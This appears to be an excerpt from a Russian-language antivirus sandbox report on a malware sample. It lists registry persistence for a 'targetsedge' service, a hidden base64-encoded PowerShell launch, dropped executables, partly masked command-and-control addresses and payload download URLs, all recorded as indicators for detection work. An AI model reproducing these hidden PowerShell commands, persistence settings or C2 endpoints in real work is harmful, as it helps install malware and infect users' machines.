Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\targetsedge] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\targetsedge] 'ImagePath' = '"%WINDIR%\SysWOW64\targetsedge.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHcAdQBiAHoAcQB0AG8AaQBvAD0AJwBHAHMAeAB2AGwAbABoAHIAbAAnADsAJABNAHEAdQB3AHYAZAB0AHAAZAB0AGEAIAA9ACAAJwA3ADcAOQAnADsAJABOAGMAdQBuAHAAZwByAGwAcgBmAG8APQAnAFcAeQBrAGgAYgBlAGIAZwB...
- %HOMEPATH%\779.exe
- %HOMEPATH%\779.exe в %WINDIR%\syswow64\targetsedge.exe
- '5.###.130.105':7080
- '91.##.197.90':80
- '68.##4.229.171':80
- '11#.#5.111.148':443
- http://www.di###pushti.org/wp-admin/cmLoLV/
- http://45.##.65.123:8080/WHlftjwKX via 45.##.65.123
- http://21#.##0.19.232:8080/UOxvkdiErr via 21#.#60.19.232
- http://17#.#.43.37:8080/UJozrWkgJCSUxq7Z via 17#.9.43.37
- DNS ASK di###pushti.org
- '%HOMEPATH%\779.exe'
- '%WINDIR%\syswow64\targetsedge.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHcAdQBiAHoAcQB0AG8AaQBvAD0AJwBHAHMAeAB2AGwAbABoAHIAbAAnADsAJABNAHEAdQB3AHYAZAB0AHAAZAB0AGEAIAA9ACAAJwA3ADcAOQAnADsAJABOAGMAdQBuAHAAZwByAGwAcgBmAG8APQAnAFcAeQBrAGgAYgBlAGIAZwB...' (со скрытым окном)